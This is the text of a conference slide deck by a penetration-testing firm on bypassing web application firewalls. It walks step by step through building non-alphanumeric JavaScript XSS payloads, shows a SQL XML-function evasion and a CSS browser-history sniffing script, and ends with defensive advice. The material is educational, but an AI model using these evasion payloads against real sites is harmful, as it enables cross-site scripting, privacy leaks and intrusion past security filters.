Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Bypassing Web Application Firewalls
1. Bypassing Web Application
Firewalls (WAFs)
Ing. Pavol Lupták, CISSP, CEH
Lead Security Consultant
www.nethemba.com
www.nethemba.com
2. Nethemba – All About Security
Highly experienced certified IT security experts (CISSP, C|EH, SCSecA)
Core business: All kinds of penetration tests, comprehensive web
application security audits, local system and wifi security audits, security
consulting, forensic analysis, secure VoIP, ultrasecure systems
OWASP activists: Leaders of Slovak/Czech OWASP chapters, coauthors
of the most recognized OWASP Testing Guide v3.0, working on new version
We are the only one in Slovakia/Czech Republic that offer:
Penetration tests and security audits of SAP
Security audit of smart RFID cards
Unique own and sponsored security research in many areas (see
our references – Vulnerabilities in public transport SMS tickets,
cracked the most used Mifare Classic RFID cards)
www.nethemba.com
3. What are WAFs?
Emerged from IDS/IPS focused on HTTP
protocol and HTTP related attacks
Usually contain a lot of complex regexp rules
to match
Support special features like cookie encryption,
CSRF protection, etc.
Except of free mod_security they are quite
expensive (and often there is no correlation
between the price and their filtering capabilities)
www.nethemba.com
4. WAFs implementations
Usually they are deployed in “blacklisting mode”
that is more vulnerable to bypasses and
targeted attacks
Application “context” (type of allowed inputs) is
necessary to know for deploying of more secure
“whitelisting mode”
All WAFs can by bypassed
WAF is just a workaround, but from the security
point of view it can be costeffective
www.nethemba.com
5. WAF filter rules
Directly reflects WAF effectiveness
For most WAF vendors they are closely
guarded secrets – most determined attackers
are able to bypass them without seeing the
actual rules
Opensource WAFs (mod_security, PHPIDS)
have open source rules which is better for
more scrutiny by skilled penetration testers
www.nethemba.com
7. Yes, WAF may be also be vulnerable!
WAF also increases the attack surface of a
target organization
WAF may be the target of and vulnerable to
malicious attacks, e.g. XSS, SQL injection,
denialofservice attacks, remote code
execution vulnerabilities
These vulnerabilities have been found in all
types of WAF products(!)
www.nethemba.com
9. Javascript obfuscation
Javascript has very powerful features
Javascript payload is used in XSS attacks
It is full of evals, expression closures, generator
expressions, iterators, special characters and
shortcuts
Supports a lot of encodings (unicode –
multibyte characters, hexadecimal, octal,
combination of all of them)
Supports XOR, “Encryption”, Base64
www.nethemba.com
10. Nonalphanumeric javascript code
Even if only few characters are allowed it is
possible to construct fully functional code:
_=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;
$$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")
[$]+(($==$)+"")[_]+(($==$)++"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}
+"")[_]+(($==$)+"")[_];$$$=(($!=$)+"")+[_]+(($!=$)+"")[__]+(($==$)+"")
[___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")[+_____]+({}+"")[_]+({}
+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({}
[$]+"")[__]+(($==$)+"")[___]; ($)[$$][$$]($$$+"('"+$_$+"')")()
([,Á,È,ª,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])()[Á+È+É+µ+Ç](~Á)
www.nethemba.com
11. Let's bypass WAF!
Example situation: WAF blocks alpha
characters and numbers (probably not a very
real situation, just proofofconcept :)
Allows only few special characters (){}_=[];$”!
+<>
Let's generate fully nonalphanumeric javascript
code!
www.nethemba.com
16. Gain alpha characters without
directly using them
When define Javascript object using the object
literal and concatenate with string, the result is
[object Object]
_={}+''; //[object Object]
alert(_[1]) //returns 'o' character
www.nethemba.com
17. Generate string “alert” without using
any alphanumeric characters
Let's start with 'a'
What Javascript object contains 'a'?
We can use 'NaN' (Not a Number)
Access empty string with index “0” (undefined)
and convert to number (NaN)
+[][+[]] // result: NaN
www.nethemba.com
18. Generating 'a' character
NaN[1]='a'
++[[]][+[]] //1
+[][+[]]+[] // result string: NaN
(+[][+[]]+[])[++[[]][+[]]] //a
We have character 'a'
www.nethemba.com
19. Generating 'l' character
Use boolean false
We can use ! (NOT) operator
e.g. ''==0 //true
Use blank array (string) and then NOT operator
to obtain boolean, wrap with [] and convert it to
string
([![]]+[]) //string “false”
www.nethemba.com
20. Generating 'l' character
++[++[[]][+[]]][+[]] //2
([![]]+[]) //string “false”
'false'[2] = ([![]]+[])[++[++[[]][+
[]]][+[]]] // 'l'
We have 'l' character!
www.nethemba.com
21. Generating 'e' character
It's easy, we can use boolean true
([!![]]+[]) // string 'true'
++[++[++[[]][+[]]][+[]]][+[]] //3
'true'[3] = ([!![]]+[])[++[++[++
[[]][+[]]][+[]]][+[]]] //e
And we have 'e' character!
www.nethemba.com
22. Generating 'r' character
It's easy, we can use boolean true
([!![]]+[]) // string 'true'
++[[]][+[]] //1
'true'[1] = ([!![]]+[])[++[[]][+
[]]] //r
And we have 'r' character!
www.nethemba.com
23. Generating 't' character
It's easy, we can use boolean true
([!![]]+[]) // string 'true'
+[] //0
'true'[0] = ([!![]]+[])[+[]] //t
And we have 't' character!
www.nethemba.com
24. And now we have 'alert' string!
(+[][+[]]+[])[++[[]][+[]]]+([![]]+
[])[++[++[[]][+[]]][+[]]]+([!![]]+
[])[++[++[++[[]][+[]]][+[]]][+[]]]+
([!![]]+[])[++[[]][+[]]]+([!![]]+
[])[+[]] //string 'alert'
www.nethemba.com
25. How to execute the code of our choice?
It is necessary to return window object to
access all properties of window
If you can access to a constructor, you can
access Function constructor to execute
arbitrary code
The shortest possible way to get window is:
alert((1,[].sort)()) // shows
window object !
Works in all browsers except IE
www.nethemba.com
26. How to generate 'sort' string
We know how to generate string 'alert'
We need to generate 'sort' string
'false'[3]=([![]]+[])[++[++[++[[]]
[+[]]][+[]]][+[]]] //'s'
We can gain 'o' from []+{} [object Object]
([]+{})[++[[]][+[]]] //o
We have already generated 'r' and 't'
www.nethemba.com
28. Let's build it together – call alert(1)
(1,[].sort)().alert(1)
After changing number 1 and all alpha
characters to their obfuscated version we get:
([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]]
[+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++
[[]][+[]]]+([!![]]+[])[+[]]])()[ (+[][+[]]
+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+
[]]][+[]]] +([!![]]+[])[++[++[++[[]][+[]]]
[+[]]][+[]]]+([!![]]+[])[++ [[]][+[]]]+
([!![]]+[])[+[]]](++[[]][+[]])
//calls alert(1)!
www.nethemba.com
29. How to call any arbitrary
Javascript function
Using the array constructor (accessing the
constructor twice from an array object returns
Function):
[].constructor.constructor(“alert(1
)”)()
We need to generate the rest 'c','n','u' letters,
gain them from the output of [].sort function:
function sort() { [native code] }
www.nethemba.com
30. SQL obfuscation
What is obfuscation of SQL injection vector?
Different DBMS have different SQL syntax,
most of them support Unicode, Base64, hex,
octal and binary representation, escaping,
hashing algorithms (MD5, SHA1)
Many “blacklisted” characters can be replaced
by their functional alternatives (0xA0 in MySQL)
Obfuscated comments – it is difficult to
determine what is a comment and what is not
www.nethemba.com
32. New SQL features
MySQL/PostgreSQL supports XML functions:
SELECT UpdateXML('<script x=_></script>',
'/script/@x','src=//0x.lv');
HTML5 supports local DB storage (SQLite
3.1+) (openDatabase object) – can be misused
for persistent XSS, local SQL injection attacks
www.nethemba.com
34. Summary
WAFs are just workarounds!
The best solution is to care about security in every SDLC
phase and strictly validate all inputs and outputs in the
application
Use whitelisting instead of blacklisting (both in the
application and WAF!)
Use multilayer security 3rdlayer database architecture or
database firewalls
for SQL use “prepared” statements
for HTML use HTML Purifier or OWASP AntiSamy project
www.nethemba.com
35. References
Web Application Obfuscation
http://www.amazon.com/WebApplicationObfuscati
XSS Attacks: Cross Site Scripting Exploits and
Defense
http://www.amazon.com/XSSAttacksScriptingExp
Special thanks to Mario Heiderich and Stefano
Di Paola
www.nethemba.com
37. Clickjacking protection
Blocks using XFRAME/OPTIONS: NEVER
<body>
<script>
if (top!=self) document.write('<plaintext>');
</script>
...
www.nethemba.com
38. CSS History attack
<style>
a { position: relative; }
a:visited { position: absolute; }
</style>
<a id=”v” href=”http://www.google.com/”>Google</a>
<script>
var l=document.getElementById(“v”);
var c=getComputedStyle(l).position;
c==”absolute”?alert(“visited”):alert(“not visited”);
</script>
www.nethemba.com
39. CSS History exploitation methods
Social network deanonymization attacks
Session ID/CSRF token local brute force attack
LAN scanners
Fixed in Firefox 4.0, current browsers are
vulnerable
www.nethemba.com